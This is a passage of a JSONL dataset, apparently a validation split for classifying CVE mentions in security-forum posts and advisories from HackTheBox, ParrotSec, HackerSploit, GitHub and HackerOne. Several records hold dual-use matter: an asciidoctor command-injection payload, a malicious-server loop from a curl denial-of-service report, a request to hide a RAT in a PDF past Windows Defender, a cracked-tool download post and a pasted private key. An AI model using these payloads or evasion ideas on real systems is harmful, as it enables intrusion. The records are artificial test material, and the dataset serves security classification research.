saw that tomcat folder has “S” priv but no idea how should I proceed. SHould I look for some specific logs? EDIT: I found a user: tomcatadm with its password. But it is not the actual user tomcat for the flag4. What I am missing? WHat is this user ?", "source": "hackthebox", "timestamp": "2023-08-18", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "bbf39efcdc2d46c3a36b", "text": "netstat -l | grep “tcp” | grep -v “tcp6” | grep -v “localhost” | wc -l", "source": "hackthebox", "timestamp": "2023-03-20", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "b4902164600d277883ae", "text": "i think you have to use python datetime module in server file, and in server file you have to check the client sent text if its \"Time\" then simply send datetime.now()", "source": "go4expert", "timestamp": "2023-02-18", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "787e077ba7ffefd0db7c", "text": "CVE: CVE-2021-25981\n\n[{'lang': 'en', 'value': 'In Talkyard, regular versions v0.2021.20 through v0.2021.33 and dev versions v0.2021.20 through v0.2021.34, are vulnerable to Insufficient Session Expiration. This may allow an attacker to reuse the admin’s still-valid session token even when logged-out, to gain admin privileges, given the attacker is able to obtain that token (via other, hypothetical attacks)'}]\n\nFix commit: Use fancy sids, not silly sids, by default.", "source": "cvefixes", "timestamp": "2022-01-03", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "096298ea1300d9fd9dca", "text": "CVE: CVE-2021-40576\n\n[{'lang': 'en', 'value': 'The binary MP4Box in Gpac 1.0.1 has a null pointer dereference vulnerability in the gf_isom_get_payt_count function in hint_track.c, which allows attackers to cause a denial of service.'}]\n\nFix commit: fixed #1904", "source": "cvefixes", "timestamp": "2022-01-13", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "1f1a23a1acd592bd11e0", "text": "Incorrect Privilege Assignment in RESTEasy\n\n[Severity: HIGH]\n\nRESTEasy 2.3.1 before 2.3.8.SP2 and 3.x before 3.0.9, as used in Red Hat JBoss Enterprise Application Platform (EAP) 6.3.0, does not disable external entities when the resteasy.document.expand.entity.references parameter is set to false, which allows remote attackers to read arbitrary files and have other unspecified impact via unspecified vectors, related to an XML External Entity (XXE) issue. NOTE: this vulnerability exists because of an incomplete fix for CVE-2012-0818.", "source": "github_advisory", "timestamp": "2022-05-14", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "1d8dd7481ffcc27fa8cc", "text": "OpenStack Compute (Nova) Resource limit circumvention in Nova private flavors\n\n[Severity: LOW]\n\nThe \"create an instance\" API in OpenStack Compute (Nova) Folsom, Grizzly, and Havana does not properly enforce the os-flavor-access:is_public property, which allows remote authenticated users to boot arbitrary flavors by guessing the flavor id. NOTE: this issue is due to an incomplete fix for CVE-2013-2256.", "source": "github_advisory", "timestamp": "2022-05-17", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "73d099321904350a7ad3", "text": "Hey if anyone is really stuck like me(for days), you should definatly short out your custom generated word list: ┌─[eu-academy-1]─[10.10.14.67]─[htb-ac84079@htb-4kknylthyj]─[~/username-anarchy] └──╼ [★]$ sed -ri '/^.{,7}$/d' harry.txt ┌─[eu-academy-1]─[10.10.14.67]─[htb-ac84079@htb-4kknylthyj]─[~/username-anarchy] └──╼ [★]$ sed -ri '/[!-/:-@\\[-`\\{-~]+/!d' harry.txt ┌─[eu-academy-1]─[10.10.14.67]─[htb-ac84079@htb-4kknylthyj]─[~/username-anarchy] └──╼ [★]$ sed -ri '/[0-9]+/!d' harry.txt ┌─[eu-academy-1]─[10.10.14.67]─[htb-ac84079@htb-4kknylthyj]─[~/username-anarchy] └──╼ [★]$ wc harry.txt 2245 2246 22629 harry.txt", "source": "hackthebox", "timestamp": "2022-12-31", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "f46ac01df1999afb6707", "text": "Building the latest versions of GCC and CLang/LLVM for ParrotOS\n\nI’m working on a cross-platform project that requires GCC v13 and CLang v16. I could use toolchains in CLion and cross-compile on Windows with MSYS2 and WSL, but I prefer to use Parrot as my primary OS since most of my development is geared toward IoT devices running either Linux or bare metal firmware. It’s just easier for me to configure these types of projects in a Linux environment than in Windows, especially when dealing with multiple toolchains and configurations for different devices. Anyway… I just need to know there is anything I need to be aware of before I attempt to build GCC 13.2.0 and CLang/LLVM 16 for ParrotOS (library considerations, compiler/linker switches, etc.) or will it be the same or similar to building for any other Debian based Linux installation?", "source": "parrotsec", "timestamp": "2023-08-25", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "8fed92dc9707488637d7", "text": "I reisnatlled firefox but still same problem, even if I click on bookmarks nothing happen, it’s strange as I like most firefox and use now chromium from couple days, cannot figure out what happened. sudo apt purge firefox-esr sudo apt autoremove firefox-esr sudo apt purge firefox* sudo apt install firefox-esr", "source": "parrotsec", "timestamp": "2022-02-08", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "4717c3fc059099e6d54c", "text": "This topic was automatically closed 120 days after the last reply. New replies are no longer allowed.", "source": "parrotsec", "timestamp": "2023-10-27", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "a378bd303ec1f88747e9", "text": "omg now i am confused i want to do one thing at a time if u have to make a first step where would u start from? i am learning from ’ hack the box ’ and ’ try hack me ’ would u guys suggest me to go with something else?", "source": "parrotsec", "timestamp": "2022-03-10", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "10f36ae14cb89e66e2aa", "text": "CVE: CVE-2022-29210\n\n[{'lang': 'en', 'value': 'TensorFlow is an open source platform for machine learning. In version 2.8.0, the `TensorKey` hash function used total estimated `AllocatedBytes()`, which (a) is an estimate per tensor, and (b) is a very poor hash function for constants (e.g. `int32_t`). It also tried to access individual tensor bytes through `tensor.data()` of size `AllocatedBytes()`. This led to ASAN failures because the `AllocatedBytes()` is an estimate of total bytes allocated by a tensor, including any pointed-to constructs (e.g. strings), and does not refer to contiguous bytes in the `.data()` buffer. The discoverers could not use this byte vector anyway because types such as `tstring` include pointers, whereas they needed to hash the string values themselves. This issue is patched in Tensorflow versions 2.9.0 and 2.8.1.'}]\n\nFix commit: Fix TensorKey hash function.\n\nThe original hash function only used total estimated `AllocatedBytes()`, which (a) is an estimate per tensor, and (b) is a very poor hash function for constants (e.g. `int32_t`).\nIt also tried to access individual tensor bytes through `tensor.data()` of size `AllocatedBytes()`. This led to ASAN failures because the `AllocatedBytes()` is an estimate of total bytes allocated by a tensor, including any pointed-to constructs (e.g. strings), and does not refer to contiguous bytes in the `.data()` buffer. We couldn't use this byte vector anyways, since types like `tstring` include pointers, whereas we need to hash the string values themselves.\n\nModified the hash function to more closely mirror the `==` operator. This correctly handles `tstring` and any numeric types that do have contiguous storage. Other types are currently left as unimplemented.\n\nPiperOrigin-RevId: 446265413", "source": "cvefixes", "timestamp": "2022-05-21", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "c6be99bb325214293ab5", "text": "nats-io/jwt not enforcing checking of Import token permissions\n\n[Severity: CRITICAL]\n\n(This advisory is canonically )\n\n## Problem Description\n\nThe NATS server provides for Subjects which are namespaced by Account; all Subjects are supposed to be private to an account, with an Export/Import system used to grant cross-account access to some Subjects. Some Exports are public, such that anyone can import the\nrelevant subjects, and some Exports are private, such that the Import requires a token JWT to prove permission.\n\nThe JWT library's validation of the bindings in the Import Token incorrectly warned on mismatches, instead of outright rejecting the token.\n\nAs a result, any account can take an Import token used by any other account and re-use it for themselves because the binding to the\nimporting account is not rejected, and use it to import *any* Subject from the Exporting account, not just the Subject referenced in the Import Token.\n\nThe NATS account-server system treats account JWTs as semi-public information, such that an attacker can easily enumerate all account JWTs and retrieve all Import Tokens from those account JWTs.\n\nThe CVE identifier should cover the JWT library repair and the nats-server containing the fixed JWT library, and any other application depending upon the fixed JWT library.\n\n\n## Affected versions\n\n#### JWT library\n\n * all versions prior to 2.0.1\n * fixed after nats-io/jwt#149 landed (2021-03-14)\n\n#### NATS Server\n\n * Version 2 prior to 2.2.0\n + 2.0.0 through and including 2.1.9 are vulnerable\n * fixed with nats-io/nats-server@423b79440c (2021-03-14)\n\n\n## Impact\n\nIn deployments with untrusted accounts able to update the Account Server with imports, a malicious account can access any Subject from an account which provides Exported Subjects.\n\nAbuse of this facility requires the malicious actor to upload their tampered Account JWT to the Account Server, providing the service operator with a data-store which can be scanned for signs of abuse.\n\n\n## Workaround\n\nDeny access to clients to update their account JWT in the account server.\n\n\n## Solution\n\nUpgrade the JWT dependency in any application using it.\n\nUpgrade the NATS server if using NATS Accounts (with private Exports; Account owners can create those at any time though).\n\nAudit all accounts JWTs to scan for exploit attempts; a Python script to audit the accounts can be found at .", "source": "github_advisory", "timestamp": "2022-02-15", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "c52ac295eaf9e1e8bce6", "text": "CVE: CVE-2022-33068\n\n[{'lang': 'en', 'value': 'An integer overflow in the component hb-ot-shape-fallback.cc of Harfbuzz v4.3.0 allows attackers to cause a Denial of Service (DoS) via unspecified vectors.'}]\n\nFix commit: [sbix] Limit glyph extents\n\nFixes https://github.com/harfbuzz/harfbuzz/issues/3557", "source": "cvefixes", "timestamp": "2022-06-23", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "dd9bc39cec92fdf80a6d", "text": "install http-server globally using npm then you’ll be able to use http-server command without ‘npm exec’", "source": "hackthebox", "timestamp": "2023-05-31", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "d6c3af6b70da171e0d50", "text": "qatarairways: it now does not want to load websites now. Try sudo dnstool address 1.1.1.1 or 8.8.8.8 Or check the settings in your browser, mostly about proxy.", "source": "parrotsec", "timestamp": "2022-02-07", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "ed8b88e03f8841dba769", "text": "[Improper Input Validation] CVE-2023-28710 Apache Airflow Spark Provider Arbitrary File Read via JDBC\n\nIn all versions of Apache Airflow Spark Provider (the verification version is 4.0.0), because the parameters are not effectively filtered, the attacker can pass in malicious schema parameters (including malicious JDBC url) when establishing a connection with SparkJDBCHook, so that when establishing When connecting, a malicious mysql server can read any file on airflow.\n\nthis is screenshot of email and ASF response email I submitted\n\n████████████████\n\n## Impact\n\nWhen airflow does not enable authentication, the attacker can modify the existing connection configuration information, so that the DAG that uses SparkJDBCOperator in the system is running and connected to a malicious mysql server (or other types of servers), and is read by the attacker on the system , and more seriously, attackers can send malicious serialized data, which eventually leads to remote code execution.\n\nThis deserialization command was not successfully verified because the version of apache-common-collections-3.2.2 used by pyspark is too high, but when the jdk version used by the target system is 7u21 or there are other exploit chains, it can Causes the deserialization command to execute", "source": "hackerone", "timestamp": "2023-07-12", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "857a4c8df4b62ef06d4d", "text": "Well, I revive this topic because even today I still had the same issue. I worked for hours to find why it doesn’t work on my VM, why it also doesn’t work on 2 others VMs of 2 differents computers or even on the pwnbox. Even on Discord, I searched for some help but nobody had the answer. Since 25 minutes, my issue disappeared. For those wondering wtf this issue is happening, the only hint I can give you is: Parrot. Now, I resolved it by using Kali. I don’t know how this magic works, but the \" 3389 port used\" error message from Responder didn’t show up, and the hash told me “Hi dude!” (you have to put your ear close of your screen for hear it). So if you really want to continue without “cheat” with the pdf, do a 2nd VM by using Kali (or use only kali… why not). To you who are reading this: you’re welcome, and have fun!", "source": "hackthebox", "timestamp": "2022-05-30", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "67372289d9a433efb183", "text": "greetings, I am looking for a laptop that has a build in wifi that has the capability of monitor/injection . I purchased a ALFFA AWUs036ACS wifi adapter and for the love god i cannot figure why it is not working with Kali Linux. I have search online for solutions but none so far has helped. So i am so frustrated that i would rather buy a laptop that has Kali with a working wifi out of the box", "source": "hackersploit", "timestamp": "2023-10-29", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "461ed9db9d750fa11b18", "text": "How to embed an exe in a pdf file that can bypass windows defender?\n\nI’m trying to be able to embed my RAT into a pdf file. I have tried many ways, to be able to bypass defender. Looking forward to finding someone who can help me", "source": "hackersploit", "timestamp": "2022-02-24", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "21da46e224a6912d56e6", "text": "CVE: CVE-2022-0157\n\n[{'lang': 'en', 'value': \"phoronix-test-suite is vulnerable to Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')\"}]\n\nFix commit: phodevi: Input sanitization updates for Phoromatic Server\n\nAlso other code formatting / cleanups while reviewing the code...", "source": "cvefixes", "timestamp": "2022-01-10", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "96e09aefa5cd61a9a977", "text": "CVE: CVE-2022-24803\n\n[{'lang': 'en', 'value': 'Asciidoctor-include-ext is Asciidoctor’s standard include processor reimplemented as an extension. Versions prior to 0.4.0, when used to render user-supplied input in AsciiDoc markup, may allow an attacker to execute arbitrary system commands on the host operating system. This attack is possible even when `allow-uri-read` is disabled! The problem has been patched in the referenced commits.'}]\n\nFix commit: Fix command injection vulnerability\n\nReported by Joern Schneeweisz from GitLab GmbH:\n\n> During an internal assessment on some GitLab code I came across a way\n> to execute arbitrary commands in your asciidoctor-include-ext Gem.\n>\n> The following adoc snippet demonstrates the issue:\n>\n> ```\n> :app-name: |id # + \\\n> http://test.com\n>\n> include::{app-name}[]\n> ```\n>\n> It uses a linebreak to bypass the `target_uri` check here\n> https://github.com/jirutka/asciidoctor-include-ext/blob/master/lib/asciidoctor/include_ext/include_processor.rb#L97\n> and feed a command with the `|` prefix to open/IO.foreach.\n>\n> You can verify this with the above snippet by rendering it like this\n>\n> ```\n> asciidoctor -r asciidoctor-include-ext -a allow-uri-read home.asciidoc\n> ```\n\nSee-Also: https://sakurity.com/blog/2015/02/28/openuri.html", "source": "cvefixes", "timestamp": "2022-04-01", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "5a784f925fa6e2e12389", "text": "CVE: CVE-2022-1286\n\n[{'lang': 'en', 'value': 'heap-buffer-overflow in mrb_vm_exec in mruby/mruby in GitHub repository mruby/mruby prior to 3.2. Possible arbitrary code execution if being exploited.'}]\n\nFix commit: class.c: clear method cache after `remove_method`.", "source": "cvefixes", "timestamp": "2022-04-10", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "079fe881aef67d905288", "text": "$ netstat -ln4 | grep LISTEN | grep -v 127 | wc -l for other confused learners like me: netstat -ln4 - services that are listening, with numeric addresses, and using the ipv4 protocol as opposed to ipv6 or unspecified grep LISTEN - find results containing the word “LISTEN” grep -v 127 - exclude any results that contain the number “127” wc -l - count the number of lines", "source": "hackthebox", "timestamp": "2022-02-16", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "415dfd3cbf261f5e841a", "text": "ChakraCore RCE Vulnerability\n\n[Severity: HIGH]\n\nA remote code execution vulnerability exists in the way that the Chakra scripting engine handles objects in memory in Microsoft Edge, aka \"Chakra Scripting Engine Memory Corruption Vulnerability.\" This affects Microsoft Edge, ChakraCore. This CVE ID is unique from CVE-2018-0979, CVE-2018-0980, CVE-2018-0990, CVE-2018-0994, CVE-2018-0995, CVE-2018-1019.", "source": "github_advisory", "timestamp": "2022-05-13", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "106ff62251227573b663", "text": "Hello there, Can you please give me a hint ? i tried: I am getting the message “Malicious request denied” but i cant find anywhere in the code the response for the “ls” or “whoami” command in order to continue further. Am i missing something ?", "source": "hackthebox", "timestamp": "2022-08-29", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "21d371eb54e7d45aecd9", "text": "CVE: CVE-2022-23078\n\n[{'lang': 'en', 'value': 'In habitica versions v4.119.0 through v4.232.2 are vulnerable to open redirect via the login page.'}]\n\nFix commit: fix(login): catch double-slash exploit", "source": "cvefixes", "timestamp": "2022-06-22", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "e286624d087bbeb751ad", "text": "SQLI Dumper v.10.4 Full Clean + Video (All other sources are fake contains malware)\n\n846×558 125 KB Video: Download: HACKING CRACKING SECURITY SEO MARKETING MMO SQLI Dumper v.10.4 Full Clean + Video (All other sources are fake contains... https://vimeo.com/746983244 Download Here VirusTotal Password Unrar is 1 VirusTotal: virustotal.com VirusTotal VirusTotal Password Unrar is 1", "source": "hackersploit", "timestamp": "2022-09-26", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "6a371f32e19d95a30ca8", "text": "Arbitrary file overwrite in OpenStack Nova\n\n[Severity: HIGH]\n\n`virt/disk/api.py` in OpenStack Compute (Nova) 2012.1.x before 2012.1.2 and Folsom before Folsom-3 allows remote authenticated users to overwrite arbitrary files via a symlink attack on a file in an image that uses a symlink that is only readable by root. NOTE: this vulnerability exists because of an incomplete fix for CVE-2012-3361.", "source": "github_advisory", "timestamp": "2022-05-17", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "9cf7bd7c880b7f2e45be", "text": "Thank you so much dude. I can’t believe this actually worked. You’re the best.", "source": "hackthebox", "timestamp": "2023-10-21", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "5b984d1099dd4f22e325", "text": "I am getting the error Error while moving: mv: and ‘t’ are the same file this is the unecoded version this is the whole thing where am I making a mistake", "source": "hackthebox", "timestamp": "2023-10-27", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "8fe414fc06f7327783ae", "text": "How to get root flag from (file.pem)\n\ni joined a challenge and i got a zip file which i further cracked and got the private key now can someone please help me on how to get the root flag from the private key which is in .pem format . well this is the private key MIIEvQIBADANBgkqhkiG9w0BAQEFAASCBKcwggSjAgEAAoIBAQClVgejYhZHHuLz TSOtYXHOi56zSocr9om854YDu/6qHBa4Nf8xFP6INNBNlYWvAxCvKM8aQsHpv3to pwpQ+YbRZDu1NxyhvfNNTRXjdFQV9nIiKkowOt6gG2F+9O5gVF4PAnHPm+YYPwsb oRkYV8QOpzIi6NMZgDCJrgISWZmUHqThybFW/7POme1gs6tiN1XFoPu1zNOYaIL3 dtZaazXcLw6IpTJRPJAWGttqyFommYrJqCzCSaWu9jG0p1hKK7mk6wvBSR8QfHW2 qX9+NbLKegCt+/jAa6u2V9lu+K3MC2NaSzOoIi5HLMjnrujRoCx3v6ZXL0KPCFzD MEqLFJHxAgMBAAECggEAc1JeYYe5IkJY6nuTtwuQ5hBc0ZHaVr/PswOKZnBqYRzW fAatyP5ry3WLFZKFfF0W9hXw3tBRkUkOOyDIAVMKxmKzguK+BdMIMZLjAZPSUr9j PJFizeFCB0sR5gvReT9fm/iIidaj16WhidQEPQZ6qf3U6qSbGd5f/KhyqXn1tWnL GNdwA0ZBYBRaURBOqEIFmpHbuWZCdis20CvzsLB+Q8LClVz4UkmPX1RTFnHTxJW0 Aos+JHMBRuLw57878BCdjL6DYYhdR4kiLlxLVbyXrP+4w8dOurRgxdYQ6iyL4UmU Ifvrqu8aUdTykJOVv6wWaw5xxH8A31nl/hWt50vEQQKBgQDYcwQvXaezwxnzu+zJ 7BtdnN6DJVthEQ+9jquVUbZWlAI/g2MKtkKkkD9rWZAK6u3LwGmDDCUrcHQBD0h7 tykwN9JTJhuXkkiS1eS3BiAumMrnKFM+wPodXi1+4wJk3YTWKPKLXo71KbLo+5NJ 2LUmvvPDyITQjsoZoGxLDZvLFwKBgQDDjA7YHQ+S3wYk+11q9M5iRR9bBXSbUZja 8LVecW5FDH4iTqWg7xq0uYnLZ01mIswiil53+5Rch5opDzFSaHeS2XNPf/Y//TnV 1+gIb3AICcTAb4bAngau5zm6VSNpYXUjThvrLv3poXezFtCWLEBKrWOxWRP4JegI ZnD1BfmQNwKBgEJYPtgl5Nl829+Roqrh7CFti+a29KN0D1cS/BTwzusKwwWkyB7o btTyQf4tnbE7AViKycyZVGtUNLp+bME/Cyj0c0t5SsvS0tvvJAPVpNejjc381kdN 71xBGcDi5ED2hVj/hBikCz2qYmR3eFYSTrRpo15HgC5NFjV0rrzyluZRAoGAL7s3 QF9Plt0jhdFpixr4aZpPvgsF3Ie9VOveiZAMh4Q2Ia+q1C6pCSYk0WaEyQKDa4b0 6jqZi0B6S71un5vqXAkCEYy9kf8AqAcMl0qEQSIJSaOvc8LfBMBiIe54N1fXnOeK /ww4ZFfKfQd7oLxqcRADvp1st2yhR7OhrN1pfl8CgYEAsJNjb8LdoSZKJZc0/F/r c2gFFK+MMnFncM752xpEtbUrtEULAKkhVMh6mAywIUWaYvpmbHDMPDIGqV7at2+X TTu+fiiJkAr+eTa/Sg3qLEOYgU0cSgWuZI0im3abbDtGlRt2Wga0/Igw9Ewzupc8 A5ZZvI+GsHhm0Oab7PEWlRY=", "source": "hackthebox", "timestamp": "2022-06-03", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "edb80764c891094aecfc", "text": "Mezzanine Cross Site Scripting (XSS) vulnerability\n\n[Severity: MEDIUM]\n\nCross Site Scripting (XSS) in Mezzanine v4.3.1 allows remote attackers to execute arbitrary code via the `Description` field of the component `admin/blog/blogpost/add/`. This issue is different than CVE-2018-16632.", "source": "github_advisory", "timestamp": "2022-05-24", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "534848e35be018e89abd", "text": "Introduction to C# - HTB Academy - Skills Assessment - Simple tips\n\nYour task is to create a C# application that will iterate through the wordlist, using each word as a potential path on the target host. You will make HTTP requests to these paths and check for the existence of flag.txt. The program will output the paths where the flag.txt file exists. Since I have not found any post about this in the forum I will give a few tips to whoever might try the module and have problems.The skill assessment is quite simple. If you try to overcomplicate it you will just have more trouble finding what you want, which is the path to the file. Keeping it as simple as possible, try to replicate what you learned about Async and also a way to iterate through the wordlist, a good idea is to have the request response being printed so you’ll have fun watching the code iterating through everything (or not). No need to use StreamReader either, it would make you work a little bit more to obtain the same result but I guess its still an option if you want an all-in-one solution", "source": "hackthebox", "timestamp": "2023-08-27", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "2febcc0aca0494aa44ea", "text": "Unsafe fall-through in getWhereConditions\n\n[Severity: CRITICAL]\n\n### Impact\n\nProviding an invalid value to the `where` option of a query caused Sequelize to ignore that option instead of throwing an error. \n\nA finder call like the following did not throw an error:\n\n```ts\nUser.findAll({\n where: new Date(),\n});\n```\n\nAs this option is typically used with plain javascript objects, be aware that this only happens at the top level of this option.\n\n### Patches\n\nThis issue has been patched in [`sequelize@6.28.1`](https://github.com/sequelize/sequelize/pull/15699) & [`@sequelize/core@7.0.0.alpha-20`](https://github.com/sequelize/sequelize/pull/15375)\n\n### References\n\nA discussion thread about this issue is open at https://github.com/sequelize/sequelize/discussions/15698\n\nCVE: CVE-2023-22579\nSnyk: https://security.snyk.io/vuln/SNYK-JS-SEQUELIZE-3324090", "source": "github_advisory", "timestamp": "2023-02-23", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "eca96fff6f5d4c0cfc14", "text": "hey darkon, sorry for the late reply. If you are still interested Ill send you an invite to the CTF team. Its hit or miss with members being active together but there is a good core of us that have been working together to tackle projects, do ctf’s together and in general help each other learn. Only requirement is a hunger for that knowledge and an open mind. Personally I consider myself gray hat but I dont judge anyone for their color hat… the world has never been as simple as black and white. I do however prefer to interact with people that have solid morals and whom use their skills for the right reasons. Hope to hear from you and I hope your journey is going well. -4p0lly0n", "source": "hackthebox", "timestamp": "2022-09-16", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "1ece3f86dc7bbc473dea", "text": "Hello, @shabbir thanks a lot for this. It is really helpful for me. Thanks", "source": "go4expert", "timestamp": "2023-02-09", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "5121ec92089c1668e4e9", "text": "Consul JWT Auth in L7 Intentions Allow for Mismatched Service Identity and JWT Providers\n\n[Severity: HIGH]\n\nA vulnerability was identified in Consul such that using JWT authentication for service mesh incorrectly allows/denies access regardless of service identities. This vulnerability, CVE-2023-3518, affects Consul 1.16.0 and was fixed in 1.16.1.", "source": "github_advisory", "timestamp": "2023-08-09", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "f07b1a77ca2d50220210", "text": "CVE: CVE-2022-0868\n\n[{'lang': 'en', 'value': 'Open Redirect in GitHub repository medialize/uri.js prior to 1.19.10.'}]\n\nFix commit: fix(parse): handle excessive colons in scheme delimiter\n\nreported by @huydoppa via huntr.dev", "source": "cvefixes", "timestamp": "2022-03-06", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "95cb6116ed09d436e6a5", "text": "CVE: CVE-2022-0755\n\n[{'lang': 'en', 'value': 'Improper Access Control in GitHub repository salesagility/suitecrm prior to 7.12.5.'}]\n\nFix commit: SuiteCRM 7.12.5 Release", "source": "cvefixes", "timestamp": "2022-03-07", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "245d8a7a1c2e7576051d", "text": "Maybe TimeVerter can help you: GitHub - D3vil0p3r/timeverter: Bruteforce time-based tokens and convert several time domains.", "source": "hackthebox", "timestamp": "2022-05-04", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "cec3763e511271b42ccc", "text": "Accessing the device on the network\n\nHello, it’s been 1-2 months since I started working on cyber security. Can I access a device connected to the same network, For example, can I get your data like sms?", "source": "parrotsec", "timestamp": "2022-06-29", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "e2a3486514ab926c3003", "text": "CVE: CVE-2022-0849\n\n[{'lang': 'en', 'value': 'Use After Free in r_reg_get_name_idx in GitHub repository radareorg/radare2 prior to 5.6.6.'}]\n\nFix commit: aaef on arm/thumb switches causes uaf ##crash\n\n* Reported by peacock-doris via huntr.dev\n* Reproducer: poc_uaf_r_reg_get", "source": "cvefixes", "timestamp": "2022-03-05", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "371edeb99836aa5c6901", "text": "[Allocation of Resources Without Limits or Throttling] CVE-2023-38039: HTTP header allocation DOS\n\nIt was found that curl does not currently limit the amount of HTTP headers to be received leading to a potential DOS for the users.\nIf an attacker sets up a malicious HTTP server that continuously sends new headers and keeps the socket open, curl will continuously listen on the socket and parse new received headers. This leads to the user's machine allocating more and more resources until the system is eventually exhausted.\nFrom research the vulnerable function seems to be located at https://github.com/curl/curl/blob/master/lib/transfer.c#L420.\nFor comparison, modern browsers abort the connection once they reach a threshold.\nOne potential fix to not affect functionality too much would be to set an arbitrary limit to the amount of headers to receive, which I believe is the solution adapted by most modern browsers to solve this issue.\n\n## Screenshot \n{F2513231}\nMy excuses for the French in screenshot (I'm sorting programs by RAM usage, and the top one is of course the windows terminal from which I executed curl). On there you can see my user terminal (windows) launching `curl 127.0.0.1:80` to the left, on the right we see the attacker's server (attaching full source code to this report). Throughout testing memory usage kept increasing alarmingly high.\n\n## Malicious server code extract:\n```\nvoid send_payload(int fd)\n{\n\tmemset(speedup, 'a', sizeof(speedup));\n\t//first we send the start of a valid HTTP request with status line and a few headers\n send(fd, validreq, sizeof(validreq), MSG_MORE);\t\n\twhile (1337)\n\t{\n\t\t//this is used to speed up the dos process sending extra bytes\n\t\tsend(fd, speedup, sizeof(speedup), MSG_MORE );\n\t\t//now we're spamming the curl client with the header \"a:b\" then telling it there's more to come !\n\t\tsend(fd, \"a:b\\x0d\\x0a\", 5, MSG_MORE );\n\t}\n}\n```\n\n## Steps To Reproduce:\n 1. Compile exploit.c and execute the server binary.\nNote: depending on your system, feel free to play with the `ATTACK_SPEED` define of the code, to speed up testing.\n 2. Open up another terminal and as the victim try `curl 127.0.0.1:80`\n 3. Observe system metrics.\n\n## Impact\n\nDOS/overloading of user's system through malicious HTTP server interaction with curl's header parsing.", "source": "hackerone", "timestamp": "2023-09-13", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "aff7ed61b561aa244b36", "text": "CVE: CVE-2022-0382\n\n[{'lang': 'en', 'value': \"An information leak flaw was found due to uninitialized memory in the Linux kernel's TIPC protocol subsystem, in the way a user sends a TIPC datagram to one or more destinations. This flaw allows a local user to read some kernel memory. This issue is limited to no more than 7 bytes, and the user cannot control what is read. This flaw affects the Linux kernel versions prior to 5.17-rc1.\"}]\n\nFix commit: net ticp:fix a kernel-infoleak in __tipc_sendmsg()\n\nstruct tipc_socket_addr.ref has a 4-byte hole,and __tipc_getname() currently\ncopying it to user space,causing kernel-infoleak.\n\nBUG: KMSAN: kernel-infoleak in instrument_copy_to_user include/linux/instrumented.h:121 [inline]\nBUG: KMSAN: kernel-infoleak in instrument_copy_to_user include/linux/instrumented.h:121 [inline] lib/usercopy.c:33\nBUG: KMSAN: kernel-infoleak in _copy_to_user+0x1c9/0x270 lib/usercopy.c:33 lib/usercopy.c:33\n instrument_copy_to_user include/linux/instrumented.h:121 [inline]\n instrument_copy_to_user include/linux/instrumented.h:121 [inline] lib/usercopy.c:33\n _copy_to_user+0x1c9/0x270 lib/usercopy.c:33 lib/usercopy.c:33\n copy_to_user include/linux/uaccess.h:209 [inline]\n copy_to_user include/linux/uaccess.h:209 [inline] net/socket.c:287\n move_addr_to_user+0x3f6/0x600 net/socket.c:287 net/socket.c:287\n __sys_getpeername+0x470/0x6b0 net/socket.c:1987 net/socket.c:1987\n __do_sys_getpeername net/socket.c:1997 [inline]\n __se_sys_getpeername net/socket.c:1994 [inline]\n __do_sys_getpeername net/socket.c:1997 [inline] net/socket.c:1994\n __se_sys_getpeername net/socket.c:1994 [inline] net/socket.c:1994\n __x64_sys_getpeername+0xda/0x120 net/socket.c:1994 net/socket.c:1994\n do_syscall_x64 arch/x86/entry/common.c:51 [inline]\n do_syscall_x64 arch/x86/entry/common.c:51 [inline] arch/x86/entry/common.c:82\n do_syscall_64+0x54/0xd0 arch/x86/entry/common.c:82 